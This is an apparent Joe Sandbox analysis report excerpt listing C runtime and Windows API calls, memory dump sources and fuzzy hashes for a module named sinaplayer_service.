                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::$FindMatchingNode::ProcessorSchedulingSpinVirtualstd::exception::exception$Base::Concurrency@@ContextCopy_strExceptionInternalOnce@?$_OversubscribedProcResetSwitchThreadThrowWait@$00@details@freestd::exception::_
                                                                                                                                                                                                    • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                    • API String ID: 1266909556-3650809737
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wsopen_s.MSVCR120(?,?,00000000,?,00000180,?,00000000,?,?,?,?,6D0AC22A,?,?,?,00000000), ref: 6D0AC32B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wsopen_s
                                                                                                                                                                                                    • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                                                                                                                                                                                    • API String ID: 2316899696-3573488595
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,?,?,?,?,6D101D7B,?,?,?,00000000), ref: 6D101962
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,00000000,?,?,?,?,6D101D7B,?,?,?,00000000), ref: 6D10196D
                                                                                                                                                                                                    • _mbsnbcmp.MSVCR120(ccs,?,00000003,?,00000000,?,?,?,?,6D101D7B,?,?,?,00000000), ref: 6D101AC9
                                                                                                                                                                                                    • _mbsnbicmp.MSVCR120(?,UTF-8,00000005), ref: 6D101AFC
                                                                                                                                                                                                    • _mbsnbicmp.MSVCR120(?,UTF-16LE,00000008), ref: 6D101B1B
                                                                                                                                                                                                    • _mbsnbicmp.MSVCR120(?,UNICODE,00000007), ref: 6D101B3A
                                                                                                                                                                                                    • __sopen_s.LIBCMT(?,?,00000109,?,00000180,?,00000000,?,?,?,?,6D101D7B,?,?,?,00000000), ref: 6D101B74
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _mbsnbicmp$__sopen_s_errno_invalid_parameter_noinfo_mbsnbcmp
                                                                                                                                                                                                    • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                                                                                                                                                                                    • API String ID: 2257928776-3573488595
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,6D160AA4,?,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004), ref: 6D0EEECD
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EEED9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EEEE0
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EEEEE
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000), ref: 6D0EEF0A
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002), ref: 6D0EEF4C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D15CF40,6D15CF40,?,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000), ref: 6D0EEF5A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionInformationLogicalProcessorThrowmallocstd::exception::exception
                                                                                                                                                                                                    • String ID: %m$%m
                                                                                                                                                                                                    • API String ID: 1610761817-510220735
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000050), ref: 6D0A2532
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A2548
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A256D
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,00000000), ref: 6D0A1C46
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: _calloc_crt.MSVCR120(00000000,00000002,?,?,?,00000000), ref: 6D0A1C5B
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,?,00000000), ref: 6D0A1C77
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0E0155
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0E015E
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000), ref: 6D0E0164
                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6D0E0170
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0E0176
                                                                                                                                                                                                    • free.MSVCR120(?,?,?), ref: 6D0E017F
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?), ref: 6D0E0188
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0E0198
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0E01A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$InfoLocale__crt_calloc_crt_malloc_crt$___free_lconv_monmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1790976588-0
                                                                                                                                                                                                    • Opcode ID: 31000dac833d3b78a40c84d2fefd28055e4657f74eb2506a1ee3b461a4042ef0
                                                                                                                                                                                                    • Instruction ID: 7f72badf3b3c1ad69ecc5957bdda8063395aea28df76c1288b21361e2da0f9d5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31000dac833d3b78a40c84d2fefd28055e4657f74eb2506a1ee3b461a4042ef0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BC15376954205BFFB20CFA9CC81FAE7BE8AF09744F154165FA04FB282E670D94187A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __FDunscale.LIBCPMT ref: 6D14AF2F
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,00000001,?,?,6D14B3BE,?,?,?,?,00000004,?,00000002,?,?,6D14B606), ref: 6D14AF49
                                                                                                                                                                                                    • __fperrraise.LIBCMT ref: 6D14AF78
                                                                                                                                                                                                      • Part of subcall function 6D13FFA8: fesetexceptflag.MSVCR120(00000004,0000001F,?,?,?,?,6D14F227,00000004), ref: 6D13FFFD
                                                                                                                                                                                                      • Part of subcall function 6D13FFA8: _errno.MSVCR120(?,?,?,6D14F227,00000004), ref: 6D140009
                                                                                                                                                                                                    • __FDunscale.LIBCPMT ref: 6D14AFD0
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dunscale$__fperrraise_errno_fdtestfesetexceptflag
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3384718034-0
                                                                                                                                                                                                    • Opcode ID: 4f770931aaf601be7162a815a6d792fd8a5d9dd6cccd1ae6719cc9abaf0004b2
                                                                                                                                                                                                    • Instruction ID: d61f49cf3dd5c67eb3e4616ac00ea1d3533220913820f26cf4f66c0402281783
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f770931aaf601be7162a815a6d792fd8a5d9dd6cccd1ae6719cc9abaf0004b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4914DB160420AEFCF01AF50DA846FE7BB4FF41750F52C599EAA167088E7B49671CB44
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __Dunscale.LIBCPMT ref: 6D14A787
                                                                                                                                                                                                    • _dtest.MSVCR120(?,?,00000001,?,?,?,?,6D14AB9A,?,?,?,00000004,?,00000002), ref: 6D14A7A1
                                                                                                                                                                                                    • __fperrraise.LIBCMT ref: 6D14A7D0
                                                                                                                                                                                                      • Part of subcall function 6D13FFA8: fesetexceptflag.MSVCR120(00000004,0000001F,?,?,?,?,6D14F227,00000004), ref: 6D13FFFD
                                                                                                                                                                                                      • Part of subcall function 6D13FFA8: _errno.MSVCR120(?,?,?,6D14F227,00000004), ref: 6D140009
                                                                                                                                                                                                    • __Dunscale.LIBCPMT ref: 6D14A828
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dunscale$__fperrraise_dtest_errnofesetexceptflag
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3316142991-0
                                                                                                                                                                                                    • Opcode ID: cad16edad36d0fc606f4dcf867887932e1fc9365d1976fa2340737c16e530515
                                                                                                                                                                                                    • Instruction ID: 62df84288af212fde0b8707ec8a54b36c0aadc4840c5605a40be1cede6713135
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cad16edad36d0fc606f4dcf867887932e1fc9365d1976fa2340737c16e530515
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C914675604A0FE6CF01AF50D980AFE77B8FF45358F23C4A9EAD196088EFB585698740
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strncnt.LIBCMT(?,005C2D90,?,7FFFFFFF,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90), ref: 6D0979EB
                                                                                                                                                                                                    • strncnt.LIBCMT(?,?,?,7FFFFFFF,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90), ref: 6D097A04
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,005C2D90,00000000,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097A38
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,005C2D90,00000000,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097AA2
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097ABB
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097B2C
                                                                                                                                                                                                    • __crtCompareStringEx.MSVCR120(?,?,00000000,?,00000000,?,?,6D097BC1,?,?,?,005C2D90,?,?,?,?), ref: 6D097B46
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90,?, *\,005C2D90,005C2A20), ref: 6D097B52
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90,?, *\,005C2D90,005C2A20), ref: 6D097B59
                                                                                                                                                                                                    • malloc.MSVCR120(?,?,6D097BC1,?,?,?,005C2D90,?,?,?,?,005C2D90,?, *\,005C2D90,005C2A20), ref: 6D0DFB80
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$_freea_sstrncnt$CompareString__crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 934863277-0
                                                                                                                                                                                                    • Opcode ID: 54f3471a649b1ccb52b4cad68a695a1fe0f135a99d436f5f46326dbf5cadb7fd
                                                                                                                                                                                                    • Instruction ID: 345ebd876713b337731541932f61d942994bfbd3538d9cb613b616d130d48540
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54f3471a649b1ccb52b4cad68a695a1fe0f135a99d436f5f46326dbf5cadb7fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8981B8B2E042569FFF158F68C890BFE7BF9EF89324F518156E914AB240D7319C019761
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_ismbblead_l$_invalid_parameter_noinfo$strncat_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1948258708-0
                                                                                                                                                                                                    • Opcode ID: e51706c755dd3bcdc8b3bcb7b75625f862735d44e085a963a7ae6cbf63f62664
                                                                                                                                                                                                    • Instruction ID: 7a1db547cda943201f49632d807dcf5eb368483f7b88b7ed416c112c59c26368
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e51706c755dd3bcdc8b3bcb7b75625f862735d44e085a963a7ae6cbf63f62664
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED810A31A482478FCB05EF68C6906BEB7B5FF55358B10455AFB609B248DFB1C841CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 6D0B3B52
                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6D0B3B6C
                                                                                                                                                                                                    • towupper.MSVCR120(0000003D), ref: 6D0B3B9C
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(?,?), ref: 6D0B3BB8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0B3BEC
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D4759
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4761
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D476C
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000002), ref: 6D0D477C
                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000001,00000000), ref: 6D0D47A4
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0D47B2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory$EnvironmentErrorLastVariable__doserrno__dosmaperr_calloc_crt_errno_invalid_parameter_noinfotowupper
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3078873410-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(0000000D,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D091AF9
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D091B25
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D091B66
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ABE5A
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C5E
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C6C
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C7A
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C88
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3C96
                                                                                                                                                                                                    • free.MSVCR120(?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0D3CA4
                                                                                                                                                                                                    • free.MSVCR120(6D091900,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D0D3CB2
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,6D091B78,00000008,6D091BDC,?,?,?,6D091BEE,00000000,6D091A28), ref: 6D0D3CCA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_lock$CriticalEnterSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4014792109-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?), ref: 6D0FDBF1
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?), ref: 6D0FDBFC
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6D0FDC1F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FDC29
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDC45
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDC52
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDC5F
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDC84
                                                                                                                                                                                                      • Part of subcall function 6D0FD51D: FileTimeToSystemTime.KERNEL32(6D0FDB61,?,?,?,?,?,?,?,?,6D0FDB61,?), ref: 6D0FD540
                                                                                                                                                                                                      • Part of subcall function 6D0FD51D: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6D0FDB61,?), ref: 6D0FD554
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDC96
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDCA8
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,00000104,?,?,?,?), ref: 6D0FDCDC
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0FDCF1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time_errno$___time64_t_from_ft$FileSystem$ErrorFindLastLocalNextSpecific_invalid_parameter_invalid_parameter_noinfo_invoke_watsonwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2524732462-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0FDE3D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D0FDE48
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?), ref: 6D0FDE6B
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FDE75
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDE91
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDE9E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDEAB
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDED0
                                                                                                                                                                                                      • Part of subcall function 6D0FD51D: FileTimeToSystemTime.KERNEL32(6D0FDB61,?,?,?,?,?,?,?,?,6D0FDB61,?), ref: 6D0FD540
                                                                                                                                                                                                      • Part of subcall function 6D0FD51D: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6D0FDB61,?), ref: 6D0FD554
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDEE2
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDEF4
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,00000104,?,?,?,?), ref: 6D0FDF18
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0FDF2F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time_errno$___time64_t_from_ft$FileSystem$ErrorFindLastLocalNextSpecific_invalid_parameter_invalid_parameter_noinfo_invoke_watsonwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2524732462-0
                                                                                                                                                                                                    • Opcode ID: fe5aa39dfbd49c9c9659161ed2391e0fed9def77aa0bf0acd61b47dbd9e54187
                                                                                                                                                                                                    • Instruction ID: d14d1f2dda5c7472a3481519f1a7dae10204bc85241e219f63d0ea2ac8a9af39
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe5aa39dfbd49c9c9659161ed2391e0fed9def77aa0bf0acd61b47dbd9e54187
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E31F5719006098BEB20EF74CC447AEB7F8EF95714F204A5AE925C7180EB78D5848FA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0FD9AC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D0FD9B7
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?), ref: 6D0FD9DA
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FD9E4
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDA00
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDA0D
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FDA1A
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDA3F
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,6D0FD935,?), ref: 6D0FD1CC
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,6D0FD935,?), ref: 6D0FD1E0
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: ___loctotime32_t.LIBCMT ref: 6D0FD20A
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDA4E
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FDA5D
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,00000104,?,?,?,?), ref: 6D0FDA7E
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0FDA95
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time_errno$___time64_t_from_ft$FileSystem$ErrorFindLastLocalNextSpecific___loctotime32_t_invalid_parameter_invalid_parameter_noinfo_invoke_watsonwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2841192990-0
                                                                                                                                                                                                    • Opcode ID: 3b47538e67cb5f2f74b6cd2b855fbfe8110ff5d261408acadd601a96dc799e2e
                                                                                                                                                                                                    • Instruction ID: 909d00ddd0b7ec7e706c831fd1dbabe692845e489ea2af3afdbf436fd1c73ef6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b47538e67cb5f2f74b6cd2b855fbfe8110ff5d261408acadd601a96dc799e2e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C621F8729086199BEB10EFB4DC447EEB3F8AF85314F11069AE925CB180E774D6818F71
                                                                                                                                                                                                    APIs
